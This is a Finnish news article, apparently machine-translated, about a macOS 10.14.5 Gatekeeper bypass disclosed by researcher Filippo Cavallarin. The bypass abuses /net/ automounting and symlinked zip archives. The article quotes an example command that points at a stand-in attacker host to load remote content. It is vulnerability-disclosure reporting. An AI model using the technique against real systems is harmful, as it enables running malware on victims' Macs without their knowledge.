Haitallisen sovelluksen asentaminen Maciin on helppoa. Apple ei ole korjannut virhettä edes kolmen kuukauden jälkeen

27. 5. 2019

Tietoturvatutkija Filippo Cavallarin julkaisi blogissaan varoituksen macOS 10.14.5 -virheestä. Tämä sisältää mahdollisuuden ohittaa Gatekeeperin turvatoimenpiteet kokonaan. Cavallarinin mukaan hän huomautti Applelle virheestä jo tämän vuoden helmikuussa, mutta yhtiö ei korjannut sitä uusimmassa päivityksessä.

Gatekeeperin on kehittänyt Apple ja se sisällytettiin sen työpöytäkäyttöjärjestelmään ensimmäisen kerran vuonna 2012. Se on mekanismi, joka estää sovellusta toimimasta ilman käyttäjän tietämystä ja suostumusta. Kun olet ladannut sovelluksen, Gatekeeper tarkistaa automaattisesti sen koodin nähdäkseen, onko ohjelmisto oikein allekirjoittanut Applen.

Blogiviestissään Cavallarin huomauttaa, että Gatekeeper pitää oletusarvoisesti sekä ulkoista tallennustilaa että verkkoosuuksia turvallisina sijainneina. Kaikki näissä kohteissa sijaitsevat sovellukset voidaan siksi käynnistää automaattisesti ilman, että sinun täytyy käydä läpi Gatekeeper-tarkistusta. Juuri tätä ominaisuutta voidaan hyödyntää haittaohjelmien käynnistämiseen käyttäjän tietämättä.

Yksi asia, joka sallii luvattoman käytön, on automaattinen asennusominaisuus, jonka avulla käyttäjät voivat liittää verkkojaon automaattisesti yksinkertaisesti määrittämällä polun, joka alkaa "/net/". Esimerkkinä Cavallarin mainitsee polun "ls /net/evil-attacker.com/sharedfolder/", joka voi saada käyttöjärjestelmän lataamaan "sharefolder"-kansion sisällön etäsijainnissa, mikä voi olla haitallista.

Voit katsoa videolta, miten uhka toimii:

Toinen tekijä on se, että jos jaetaan zip-arkisto, joka sisältää tietyn automaattiseen liittämistoimintoon johtavan symbolin, Gatekeeper ei tarkista sitä. Tällä tavalla uhri voi helposti ladata haitallisen arkiston ja purkaa sen, jolloin hyökkääjä voi käyttää käytännössä mitä tahansa ohjelmistoa Macissa käyttäjän tietämättä. Finderilla, joka piilottaa tietyt laajennukset oletuksena, on myös oma osuutensa tästä haavoittuvuudesta.

Cavallarin kertoo blogissaan, että Apple kiinnitti huomion macOS-käyttöjärjestelmän haavoittuvuuteen tämän vuoden helmikuun 22. päivänä. Mutta toukokuun puolivälissä Apple lopetti yhteydenpidon Cavallarinin kanssa, joten Cavallarin päätti julkistaa koko jutun.

Lähde: FCVL

Aiheet: varastointi, Automaattinen, MacOS, video-, nastavení, toiminto, käyttäjä, aplikace, omena

Artikkelin keskustelu

Sinun nimesi

Kommenttisi

Täyttämällä yllä olevat tiedot vahvistan, että yritys TEXT FACTORY s.r.o., kotipaikka Brno, Durďákova 336/29, Černá Pole, postinumero: 613 00, tunnus: 06157831, rekisteröity Brnon alueoikeuteen, osasto C , lisää 100399, käsittelee täyttämässäni rekisteröintilomakkeessa annettuja henkilötietojani TEXT FACTORY s.r.o.:n oikeutettujen etujen perusteella 6 artiklan 1 kohdan kirjeen mukaisesti f) GDPR ja oikeudellisten velvoitteiden täyttäminen (6 artiklan 1 kohdan c alakohta GDPR) seuraaviin tarkoituksiin: tarve varmistaa TEXT FACTORY s.r.o.:n ylläpitämien verkkosivustojen vierailijoille lupa osallistua aktiivisesti julkaistuihin artikkeleihin tai keskusteluun foorumeilla ja käyttää TEXT FACTORY s.r.o.:n oikeuksia näiden keskustelufoorumien ylläpitäjänä. Lisätietoa henkilötietojen käsittelystä ja oikeuksista löytyy osoitteesta Oppitunteja henkilötietojen suojasta. koko tekstiä

Se voisi olla kiinnostaa sinua

Souvisejici